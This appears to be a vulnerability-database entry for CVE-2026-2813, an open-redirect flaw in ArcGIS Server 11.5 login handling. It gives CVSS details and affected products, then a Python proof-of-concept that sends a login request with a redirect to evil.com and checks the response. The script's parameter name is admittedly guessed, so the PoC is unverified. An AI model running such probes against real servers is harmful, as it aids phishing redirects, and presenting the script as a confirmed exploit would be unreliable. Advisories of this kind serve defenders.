Security Vulnerability Report
CVE-2026-2813 CVSS 4.7 MEDIUM

Published: 2026-05-20 20:16:37
Last Modified: 2026-05-21 18:54:30

Description

ArcGIS Server contains an input validation weakness in the login redirection workflow. An authenticated attacker could exploit this issue by sending a specially crafted request. Successful exploitation may result in the application redirecting the browser to an unintended, untrusted site, resulting in a limited confidentiality impact under specific user interaction conditions. The vulnerability affects only the client-side navigation logic during authentication and remains confined to the same security boundary. No server-side compromise or cross-component impact is possible. This issue affects ArcGIS Server 11.5.

CVSS Details

CVSS Score: 4.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
Weakness: CWE-601 (URL Redirection to Untrusted Site, "Open Redirect")

The 4.7 score above is the Secondary CVSS v3.1 metric in the NVD record. The Primary metric is CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N (base score 4.1, MEDIUM); it differs only in Privileges Required (Low instead of None), which is consistent with the description's authenticated attacker. Both vectors require user interaction and rate a changed scope with low confidentiality impact and no integrity or availability impact.

Configurations (Affected Products)

cpe:2.3:a:esri:arcgis_server:11.5:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
ArcGIS Server 11.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# PoC for CVE-2026-2813: ArcGIS Server Open Redirect
# This script sends a login request carrying an attacker-controlled redirect
# parameter and checks whether the server's Location header points off-site.
target_url = "https://example.com/arcgis/home/signin.html"  # Example login endpoint
malicious_site = "http://evil.com"

# The application likely fails to validate the 'redirect_url' or 'return_url' parameter.
# Attacker constructs a URL to redirect the victim after login.
payload = {
    "redirect_url": malicious_site,
    "username": "test",
    "password": "test",
}

print(f"[*] Attempting to send request to {target_url} with redirect to {malicious_site}")

try:
    # Sending the request (allow_redirects=False to see the 302 response)
    response = requests.post(target_url, data=payload, allow_redirects=False, timeout=5)

    # Check if the response is a redirect (HTTP 302)
    if response.status_code == 302:
        location = response.headers.get("Location")
        if location and malicious_site in location:
            print(f"[+] Vulnerability Confirmed! Server redirected to: {location}")
        else:
            print(f"[-] Redirect occurred but to a different location: {location}")
    else:
        print(f"[-] Expected 302 Redirect, got status code: {response.status_code}")
except requests.RequestException as e:
    print(f"[!] Error occurred: {e}")
```

References

https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/april2026_security_bulletin (Vendor Advisory)